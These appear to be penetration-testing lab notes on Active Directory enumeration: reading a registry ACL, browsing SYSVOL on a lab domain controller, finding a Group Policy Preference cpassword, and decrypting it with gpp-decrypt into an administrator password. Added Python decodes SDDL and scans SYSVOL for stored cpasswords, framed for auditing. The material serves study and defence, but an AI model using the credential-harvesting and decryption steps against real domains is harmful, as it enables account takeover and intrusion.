Get-ACL
Gets the security descriptor for a resource, such as a file or registry key.
The permissions required to enumerate sessions with NetSessionEnum are defined in the SrvsvcSessionInfo registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity
PS C:\Tools> Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : BUILTIN\Users Allow ReadKey
BUILTIN\Administrators Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
CREATOR OWNER Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow ReadKey
Audit :
Sddl : O:SYG:SYD:AI(A;CIID;KR;;;BU)(A;CIID;KA;;;BA)(A;CIID;KA;;;SY)(A;CIIOID;KA;;;CO)(A;CIID;KR;;;AC)(A;CIID;KR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)
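The Access column above is only a rendering of the Sddl string, and the SDDL form is what you get back from tools that export or compare ACLs. As an added example (not from these notes), the Python below decodes that exact Sddl string into readable ACEs and answers the question that matters here: which principals can read the key. The alias and rights tables, the Ace class and the principals_with_read helper are my own; they cover the tokens that appear in ordinary registry ACLs and pass unknown SIDs through unchanged.

```python
"""Decode a registry SDDL string (as printed by Get-Acl) into readable ACEs.

Added example, not code from the original notes. DEFAULT_SECURITY_SDDL is the
Sddl value Get-Acl printed for the LanmanServer\\DefaultSecurity key above.
"""
import re
from dataclasses import dataclass

# SDDL string copied from the Get-Acl output above.
DEFAULT_SECURITY_SDDL = (
    "O:SYG:SYD:AI(A;CIID;KR;;;BU)(A;CIID;KA;;;BA)(A;CIID;KA;;;SY)"
    "(A;CIIOID;KA;;;CO)(A;CIID;KR;;;AC)(A;CIID;KR;;;S-1-15-3-1024-1065365936-"
    "1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)"
)

# Well-known two-letter SID aliases (subset); anything else stays a raw SID.
SID_ALIASES = {
    "BU": "BUILTIN\\Users", "BA": "BUILTIN\\Administrators",
    "SY": "NT AUTHORITY\\SYSTEM", "AU": "NT AUTHORITY\\Authenticated Users",
    "CO": "CREATOR OWNER", "WD": "Everyone", "DU": "Domain Users",
    "AC": "APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES",
}
# Rights tokens: registry-specific, generic and standard rights.
RIGHTS = {
    "KA": "FullControl", "KR": "ReadKey", "KW": "WriteKey", "KX": "ExecuteKey",
    "GA": "GenericAll", "GR": "GenericRead", "GW": "GenericWrite", "GX": "GenericExecute",
    "RC": "ReadControl", "SD": "Delete", "WD": "WriteDac", "WO": "WriteOwner",
}
ACE_TYPES = {"A": "Allow", "D": "Deny", "AU": "Audit", "OA": "ObjectAllow", "OD": "ObjectDeny"}
ACE_FLAGS = {"CI": "ContainerInherit", "OI": "ObjectInherit", "IO": "InheritOnly",
             "NP": "NoPropagateInherit", "ID": "Inherited"}
DACL_FLAGS = {"P": "Protected", "AR": "AutoInheritReq", "AI": "AutoInherited"}
# Any of these rights lets the principal read the key.
READ_RIGHTS = {"ReadKey", "FullControl", "GenericRead", "GenericAll"}


@dataclass
class Ace:
    ace_type: str
    flags: list
    rights: list
    principal: str


def split_tokens(text, table):
    """Split a run of SDDL tokens such as 'CIIOID' using a table of 1- or 2-letter keys."""
    out, i = [], 0
    while i < len(text):
        for width in (2, 1):
            tok = text[i:i + width]
            if tok in table:
                out.append(table[tok])
                i += width
                break
        else:
            raise ValueError(f"unknown SDDL token at {text[i:]!r}")
    return out


def parse_rights(text):
    """Rights are either a hex access mask or a run of two-letter right tokens."""
    if text.lower().startswith("0x"):
        return [f"Mask:{int(text, 16):#010x}"]
    return split_tokens(text, RIGHTS)


def resolve_sid(sid):
    return SID_ALIASES.get(sid, sid)


def parse_sddl(sddl):
    """Return (owner, group, dacl_flags, [Ace, ...]) for an SDDL string."""
    # The only colons in SDDL are the O:/G:/D:/S: section markers.
    parts = re.split(r"([OGDS]):", sddl)
    if parts[0] != "" or len(parts) % 2 == 0:
        raise ValueError("not an SDDL string")
    sections = dict(zip(parts[1::2], parts[2::2]))
    dacl = sections.get("D", "")
    prefix = dacl.split("(", 1)[0]
    dacl_flags = split_tokens(prefix, DACL_FLAGS) if prefix else []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE {body!r}")
        ace_type, ace_flags, rights, _obj_guid, _inherit_guid, sid = fields
        aces.append(Ace(
            ace_type=ACE_TYPES.get(ace_type, ace_type),
            flags=split_tokens(ace_flags, ACE_FLAGS) if ace_flags else [],
            rights=parse_rights(rights),
            principal=resolve_sid(sid),
        ))
    return resolve_sid(sections.get("O", "")), resolve_sid(sections.get("G", "")), dacl_flags, aces


def principals_with_read(sddl):
    """Principals that end up with read access: an Allow ACE and no Deny ACE for read."""
    _owner, _group, _flags, aces = parse_sddl(sddl)
    denied = {a.principal for a in aces if a.ace_type == "Deny" and READ_RIGHTS & set(a.rights)}
    allowed = []
    for a in aces:
        if a.ace_type == "Allow" and READ_RIGHTS & set(a.rights) \
                and a.principal not in denied and a.principal not in allowed:
            allowed.append(a.principal)
    return allowed


if __name__ == "__main__":
    owner, group, flags, aces = parse_sddl(DEFAULT_SECURITY_SDDL)
    print(f"Owner: {owner}  Group: {group}  DACL flags: {flags}")
    for ace in aces:
        print(f"  {ace.ace_type:5} {','.join(ace.rights):12} {ace.principal}  [{','.join(ace.flags)}]")
    # The audit question: can ordinary users read this key?
    print("BUILTIN\\Users can read:", "BUILTIN\\Users" in principals_with_read(DEFAULT_SECURITY_SDDL))
```

Run it as-is and it prints the six ACEs from the output above and reports that BUILTIN\Users has ReadKey; feed it the Sddl of the same key from other servers and any host where standard users have lost read access stands out immediately.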
Enumerating Shares
ls
By default, the SYSVOL folder is mapped to %SystemRoot%\SYSVOL\Sysvol\domain-name on the domain controller and every domain user has access to it.
We should investigate every folder we discover.
PS C:\Tools> ls \\dc1.corp.com\sysvol\corp.com\
Directory: \\dc1.corp.com\sysvol\corp.com
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/21/2022 1:11 AM Policies
d----- 9/2/2022 4:08 PM scripts
ls - Policies
PS C:\Tools> ls \\dc1.corp.com\sysvol\corp.com\Policies\
Directory: \\dc1.corp.com\sysvol\corp.com\Policies
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/21/2022 1:13 AM oldpolicy
d----- 9/2/2022 4:08 PM {31B2F340-016D-11D2-945F-00C04FB984F9}
d----- 9/2/2022 4:08 PM {6AC1786C-016F-11D2-945F-00C04fB984F9}
cat
We will cat all policy files we find, including the old policies.
PS C:\Tools> cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="Administrator (built-in)"
image="2"
changed="2012-05-03 11:45:20"
uid="{253F4D90-150A-4EFB-BCC8-6E894A9105F7}">
<Properties
action="U"
newName=""
fullName="admin"
description="Change local admin"
cpassword="+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
changeLogon="0"
noChange="0"
neverExpires="0"
acctDisabled="0"
userName="Administrator (built-in)"
expires="2016-02-10" />
</User>
</Groups>
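Catting files one at a time does not scale to a SYSVOL with many policies, and the thing to look for is the same every time: a Group Policy Preference element carrying a cpassword attribute. As an added example (not part of these notes), the Python below walks a directory tree shaped like SYSVOL and reports every such element, whatever the preference type. The Groups XML sample is the old-policy-backup.xml shown above; the Drives.xml sample, the directory layout built by build_demo_tree, the Finding fields and the list of account attribute names are constructed for this example.

```python
"""Sweep a SYSVOL copy for Group Policy Preference XML that still stores a cpassword.

Added example, not from the original notes. It matches on the cpassword
attribute rather than a particular tag, so Groups.xml, Services.xml,
ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml are all covered.
"""
import os
import tempfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Copied from the old-policy-backup.xml shown above.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2012-05-03 11:45:20" uid="{253F4D90-150A-4EFB-BCC8-6E894A9105F7}">
    <Properties action="U" newName="" fullName="admin" description="Change local admin" cpassword="+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" userName="Administrator (built-in)" expires="2016-02-10" />
  </User>
</Groups>
"""

# Constructed Drives.xml with no stored credential (clsid attributes omitted); must not be flagged.
SAMPLE_DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives>
  <Drive name="S:" changed="2022-09-02 16:08:00">
    <Properties action="U" path="\\\\dc1.corp.com\\share" label="Share" letter="S" />
  </Drive>
</Drives>
"""

# Attribute names the different GPP types use for the account the password belongs to.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


@dataclass
class Finding:
    path: str       # file the secret was found in
    element: str    # tag carrying the cpassword attribute
    account: str    # account name, if the element names one
    changed: str    # 'changed' timestamp of the enclosing preference item
    cpassword: str  # the stored (still encrypted) value


def find_cpasswords(xml_text, source="<string>"):
    """Return a Finding for every element with a non-empty cpassword attribute."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    # ElementTree has no parent links; the 'changed' stamp sits on the parent item.
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if not cpw:
            continue
        parent = parents.get(elem)
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
        changed = parent.get("changed", "") if parent is not None else ""
        findings.append(Finding(source, elem.tag, account, changed, cpw))
    return findings


def scan_sysvol(root_dir):
    """Walk a directory (a mounted or copied SYSVOL) and collect findings from every .xml file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
            except (ET.ParseError, OSError):
                continue  # non-GPP XML or an unreadable file is skipped, not fatal
    return findings


def build_demo_tree(base_dir):
    """Write the two samples into a constructed SYSVOL-shaped layout under base_dir."""
    layout = {
        os.path.join("Policies", "oldpolicy", "old-policy-backup.xml"): SAMPLE_GROUPS_XML,
        os.path.join("Policies", "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                     "Machine", "Preferences", "Drives", "Drives.xml"): SAMPLE_DRIVES_XML,
    }
    for rel, text in layout.items():
        full = os.path.join(base_dir, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(text)
    return base_dir


def demo():
    """Build the sample tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return scan_sysvol(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: <{f.element}> account={f.account!r} changed={f.changed} cpassword={f.cpassword}")
```

Point scan_sysvol at a copy of \\dc1.corp.com\sysvol\corp.com\ (or at the path itself from a domain-joined host) and it returns one Finding per stored credential, with the file and the changed timestamp so the owning GPO can be cleaned up. MS14-025 (KB2962486) stopped the preference editor from saving new cpassword values but left files already in SYSVOL in place, which is why old backups like the one above still turn up.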
Decrypt password
We found an encrypted password (the cpassword attribute) in the previous file; we can use gpp-decrypt on Kali to attempt to decrypt it.
kali@kali:~$ gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
P@$$w0rd